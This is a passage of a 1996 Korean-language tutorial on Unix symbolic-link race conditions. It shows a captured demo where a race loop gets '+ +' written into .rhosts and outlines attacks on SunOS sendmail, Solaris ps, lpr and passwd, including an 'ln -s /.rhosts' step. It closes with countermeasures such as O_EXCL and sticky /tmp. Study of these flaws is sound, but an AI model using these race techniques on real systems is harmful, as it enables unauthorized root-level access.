이 프로그램은 시작할 때, 먼저 lstat()을 이용, 파일이 존재하는지 안하는지를 체크한다. 없으면, open에서 O_CREAT 옵션을 이용하여, 파일을 생성하고 data를 "+ +"을 넣는다. "+ +"은 유별난 데이터지만 sendmail의 경우, 마음대로 data를 바꾸어서 넣을 수 있으므로, "+ +"을 넣었다고 가정한다.

파일이 존재하면 lstat으로 부터 얻은 정보를 이용해서, symbolic link인지 아닌지를 체크한다. symbolic link이면 이 프로그램의 의도에 맞게 대응할 수 있다. 그렇게 않으면 일반 파일이므로, 내용을 추가하여 넣는다.

이제 이 두 프로그램의 race를 지켜보기 바란다. 여기 실행 결과를 Capture한 파일을 보인다.

---------- Captured File ---------------------
Script started on Wed Aug 21 02:19:24 1996
[moses:/u4/norther/seoro] 1 cat ./.rhosts
nowhere nobody
[moses:/u4/norther/seoro] 2 race &
[1] 6519
[moses:/u4/norther/seoro] 3 xx
File does EXIST!
Now This file is a link
THIS IS SYMBOLIC LINK. DIE MAN
[moses:/u4/norther/seoro] 4 xx
File does not Exist.
Now ok is Appended.
[moses:/u4/norther/seoro] 5 cat ./.rhosts
+ +
ere nobody
[moses:/u4/norther/seoro] 6 xx
File does EXIST!
Now This file is a link
THIS IS SYMBOLIC LINK. DIE MAN
[moses:/u4/norther/seoro] 7
script done on Wed Aug 21 02:20:11 1996
---------------------------------------------

자 옆에 달린 1,2,3.. 번호를 따라가본다.

1번에서 먼저 .rhosts에 들어있는 파일을 보았다. "nowhere nobody"라는 데이터가 들어 있다.

2번에서 race &로 돌려 background로 계속해서 tmp.data를 지웠다가 링크하는 과정을 반복하고 있다.

드디어 3번에서 목표 프로그램을 실행해본다. 파일이 존재하며, 그것이 symbolic link임이 드러난다. 이것은 race할때, unlink()하여, 파일을 없앤 순간이 아니라, symbolic link를 연결한 순간에 lstat()에 걸려서 나타난 현상이다.

4번에서 다시 시도한다. 이번에는 파일이 없으며, 내용을 넣는다고 나타났다.

5번에서 .rhosts내용을 확인해본 결과, 아닌게 아니라 "+ +"메시지가 들어가있다.

6번에서 한번 더 해보았지만 실패하고 만다.

매우 확실한 예제로 이정도면 race가 왜 등장하게 되었는지 알 수 있으리라고 생각한다. 이제 실제 예로 몇가지 예를 설명한다.

5. Some Examples

 

[1] SunOS sendmail(/bin/mail)

SunOS의 sendmail은 외부로 부터 온 메일을 받아서 그것을 /var/spool/mail/$USER 위치에 넣는다. $USER라는 표기는 그냥 온 유저에 맞도록 넣는다는 의미이다. 문제는 그 유저의 permission으로 넣어주기 위해서(chown) Root권한으로 프로그램이 돌아간다는 사실이다.

/var/spool/mail의 디렉토리가 777로 열려있다고 가정한다. 이때, /etc/passwd에는 entry가 존재하고, /var/spool/mail에는 아직 존재하지 않는 유저가 있다고 생각해보자. ftp, sundiag등 mail이 날아올 일이 없는 id가 분명히 있을 것이다. 이런 경우 race condition으로 시스템에 구멍이 생긴다.

ftp를 지목하였다고 하자. race 프로그램을 만든다. 그것은 /var/spool/mail/ftp를 지웠다가 그 파일을 'ln -s /.rhosts /var/spool/mail/ftp'로 링크하는 것을 반복하는 것이라고 생각한다. 이제 race프로그램을 돌린다. 그런 후에, ftp로 아주 적절한 data를 넣어서 메일을 보낸다. 그러면 어떻게 되는가?

sendmail은 4장에서 소개한 방법으로 Symbolic link를 판별한다. 그러므로, 확률이 반반정도로 위의 예처럼 잘 걸린 경우 그 내용이 /.rhosts에 들어가든지 unlink()되어 파일이 없었던 경우라면, ftp라는 파일이 생성되고 결말이 날 것이다.

[2] Solaris 2.x ps(/usr/bin/ps)

여기부터는 간략히 그 메카니즘만을 설명하기로 한다. Solaris 2.x에 있는 ps는 /tmp 디렉토리에 임시파일을 만들고, 그 파일에 내용을 쓴 다음 chown()을 이용하여, 권한을 바꾸고 마지막으로 그것을 /tmp/ps_data라는 파일로 rename시켜준다.

이것은 어떤 방법으로 race condition이 가능한가?

이번의 race프로그램은 약간 신경을 써서 만들어야 한다. 임시로 만들어지는 파일의 이름이 무엇인지 알지 못하므로, 이런 경우에는 race프로그램에서 계속해서 /tmp디렉토리를 search해가면서 나타나는 파일마다 race를 걸어주어야 하게 된다.

search하면서 파일이 나타나면, 그것을 unlink()시키고, 그다음 그것을 우리가 원하는 파일에 링크한다. 그 후 그 파일을 chown()시키므로, 우리가 원하는 파일의 permission이 바뀌게 된다.

[3] Misc

/usr/ucb/lpr            임시 파일이 1000을 주기로 이름이 반복된다.
                              lpr -q -s 옵션을 이용 원하는 파일에 symbolic link가능

/bin/passwd -F       패스워드 변경시 /etc/ptmp라는 파일을 생성, 내용을
                              바꾼후에, /etc/passwd에 overwrite시킨다.

/usr/lib/sendmail     보낸 user가 존재하지 않는 경우, /var/tmp/dead.letter에
                              Guessing가능한 파일이 생성된다.

6. 대책

 

race condition, 또는 symbolic link에 의한 대책은 여러가지가 있을 수 있다.

첫째, 가능한한 임시 파일을 만들지 않는 것이다.

요즈음 시스템이 비대해지면서, 어느정도는 메모리 내에서 처리가 가능하다. 굳이 임시 파일을 만드는 것은 race condition의 원인이 된다.

둘째, unlink()를 불가능하게 한다.

unlink()를 시키지 못하면, symbolic link가 만들어 지는 것은 불가능하다. 위의 Solaris의 ps버그는 /tmp가 0777모드로 다른 유저가 /tmp의 파일을 modify가능하기에 나타난 버그이다. 이런 경우 /tmp를 1777로 sticky를 붙이게 되면, unlink()가 불가능해진다.

셋째, creat()와 open()의 구분을 확실히 한다.

이것은 /bin/mail의 경우 확연한 것으로 만들고자 하는 파일을 계속 지웠다가 링크를 만들었다가 하므로, 결국 공격을 당할 시에는 두가지 경우만이 존재한다. symbolic link이거나, 정말로 존재하지 않거나 두가지이다. 그러므로, lstat()에서 파일이 존재하지 않은 것으로 판명된 경우는 open()시킬 때, 옵션을 O_WRONLY|O_CREAT으로 주는 것이 아니라, 여기에 O_EXCL을 첨가하여, 만일 어떤 식으로든 파일이 존재하는 경우, 파일 생성 또는 쓰기를 포기하게 하는 것이다.

넷째, umask를 최하 022정도 유지한다.

파일이 생성되는 경우, 기본 permission이 666으로 누구나 와서 쓸 수 있다. 이에 umask를 이용하면, permission이 mask되어 나와서, 다른 유저의 write permission을 없애준다.

그외에도 많이 있을 수 있겠으나, 이정도로 간단히 정리하도록 한다.

7. 결론

 

이하 race condition에 대해서 다루었다. UNIX시스템에서 이렇듯 시스템 프로그램에 얼마든지 버그가 존재할 수 있으며, 여기에 대해 적극 대처하는 것이 필요하다.

여기까지 race conditon을 일단(!)마치고, 점차적으로 내용을 늘려나가기로 한다.

--------------------
Seoro Lee, Miso Tech
--------------------